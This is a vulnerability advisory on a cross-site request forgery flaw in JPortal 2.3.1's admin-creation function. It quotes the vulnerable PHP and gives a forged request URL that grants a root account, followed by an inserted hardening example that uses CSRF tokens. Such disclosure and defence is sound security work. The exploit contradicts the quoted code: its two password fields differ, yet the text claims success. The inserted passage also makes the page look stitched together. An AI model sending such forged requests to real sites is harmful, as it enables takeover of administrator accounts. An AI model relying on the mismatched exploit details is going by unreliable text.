Jportal 2.3.1 CSRF vulnerability

Published: 2007.02.15
Credit: dzitu
Risk: Medium
CWE: CWE-352
CVE: CVE-2007-0912
Local: No
Remote: Yes

CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (it is very likely that older versions are vulnerable too)
The problem is in admin/admin.adm.php:

function add_admin() {

    // Every input is pulled from the global scope: there is no explicit
    // $_POST/$_GET source and no anti-CSRF token anywhere in the function.
    global $name, $mail, $nick_, $action, $user_tbl, $access;
    global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

    if($access=='root') {            // only requires that a root admin session exists

        if($_pass==$pass_) {         // password and repeated password must match

            if($acce['news']=='') $acce['news']='n';
            if($acce['info']=='') $acce['info']='n';
            if($acce['art']=='') $acce['art']='n';
            if($acce['sonda']=='') $acce['sonda']='n';
            if($acce['link']=='') $acce['link']='n';
            if($acce['forum']=='') $acce['forum']='n';
            if($acce['comm']=='') $acce['comm']='n';
            if($acce['menu']=='') $acce['menu']='n';
            if($acce['bann']=='') $acce['bann']='n';
            if($acce['topic']=='') $acce['topic']='n';
            if($acce['file']=='') $acce['file']='n';

            if($acce['root']<>'t') {

                $acce_ = $acce['news'].'-'.$acce['art'].'-'.$acce['info'].'-'.$acce['sonda'].'-'.$acce['link'].'-'.$acce['forum'].'-'.$acce['comm'].'-'.$acce['file'].'-'.$acce['menu'].'-'.$acce['bann'].'-'.$acce['topic'];

            } else {

                $acce_ = 'root';     // acce[root]=t taken straight from the request grants full rights

            }

            $query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)";
            $result = mysql_query($query);

            add_log('dodano administratora (ID '.mysql_insert_id().')');   // "administrator added"

            if($goto=='')
                header("Location: admin.php?op=$op");
            else
                header("Location: $goto");
            exit;
        }
    }
}

As we can see, all variables come from "nowhere" (i.e. they can arrive via POST, GET or even COOKIE), and the script never
checks whether it was launched by the admin through the admin panel. Because of this, as long as an admin has logged in and
not logged out, getting him to send a prepared request (for example via our profile avatar) gives us a root account.

http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admin&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us root account with name "admin" and password "pass".
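The following is an added example written for this note, not code from JPortal: a hardened counterpart of add_admin() in PHP that adds the two controls the original lacks. It reads input only from the POST body (so a GET with an image tag or a link cannot trigger it) and requires a per-session anti-CSRF token that a cross-site page cannot read, and it also replaces md5() with password_hash(). The function names csrf_token, csrf_check and add_admin_hardened are assumed, and the session and request arrays are passed in as parameters so the script runs from the command line; in a real handler they would be $_SESSION, $_SERVER['REQUEST_METHOD'] and $_POST.

```php
<?php
// Added example (not JPortal code): CSRF-token protection around an
// "add administrator" action like add_admin(). Session and request data are
// passed in explicitly so the logic can be exercised from the CLI.

// Issue one token per session and embed it in the admin form as a hidden
// field: <input type="hidden" name="csrf_token" value="...">
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// A request is accepted only if it is a POST carrying the session's token.
// A request forged from another origin cannot know the token, so it fails
// here. hash_equals() compares in constant time.
function csrf_check(array $session, string $method, array $post): bool {
    if ($method !== 'POST') {
        return false;
    }
    if (empty($session['csrf_token']) || empty($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Hardened counterpart of add_admin(): reads only from $post (no variables
// "from nowhere"), requires the CSRF token, and hashes the password with
// password_hash() instead of md5(). Returns the row that would be inserted
// (stand-in for the INSERT), or null when the request is refused.
function add_admin_hardened(array $session, string $method, array $post): ?array {
    if (($session['access'] ?? '') !== 'root') {
        return null;                       // caller is not a logged-in root admin
    }
    if (!csrf_check($session, $method, $post)) {
        return null;                       // cross-site or token-less request: refuse
    }
    $nick = trim((string) ($post['nick_'] ?? ''));
    $pass = (string) ($post['_pass'] ?? '');
    if ($nick === '' || $pass === '' || $pass !== (string) ($post['pass_'] ?? '')) {
        return null;                       // missing nick or password mismatch
    }
    $acce = is_array($post['acce'] ?? null) ? $post['acce'] : [];
    if (($acce['root'] ?? '') === 't') {
        $acce_ = 'root';
    } else {
        $parts = [];
        foreach (['news','art','info','sonda','link','forum','comm','file','menu','bann','topic'] as $k) {
            $parts[] = (($acce[$k] ?? '') === '') ? 'n' : (string) $acce[$k];   // same layout as the original
        }
        $acce_ = implode('-', $parts);
    }
    return [
        'nick'      => $nick,
        'pass_hash' => password_hash($pass, PASSWORD_DEFAULT),
        'name'      => (string) ($post['name'] ?? ''),
        'access'    => $acce_,
        'mail'      => (string) ($post['mail'] ?? ''),
    ];
}

// Demonstration with constructed input shaped like the request in the advisory.
$session = ['access' => 'root'];           // constructed: a logged-in root admin
$token   = csrf_token($session);
$forged  = ['name' => 'admin', 'nick_' => 'admin', '_pass' => 'pass',
            'pass_' => 'pass', 'acce' => ['root' => 't']];

var_dump(add_admin_hardened($session, 'GET',  $forged));    // refused: not a POST
var_dump(add_admin_hardened($session, 'POST', $forged));    // refused: no token
$legit = $forged + ['csrf_token' => $token];                 // submitted from the real admin form
var_dump(add_admin_hardened($session, 'POST', $legit));     // accepted: row with access 'root'
```

Run it with `php example.php`. The token check is what closes the hole described above: the admin's browser still attaches the session cookie to a forged request, but the forged page cannot read the token from the admin form, so the request is refused. Restricting the action to POST and setting the SameSite attribute on the session cookie are complementary layers, not a replacement for the token.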

Dżitu
dzitu (at) poczta (dot) fm [email concealed]

Copyright 2014, cxsecurity.com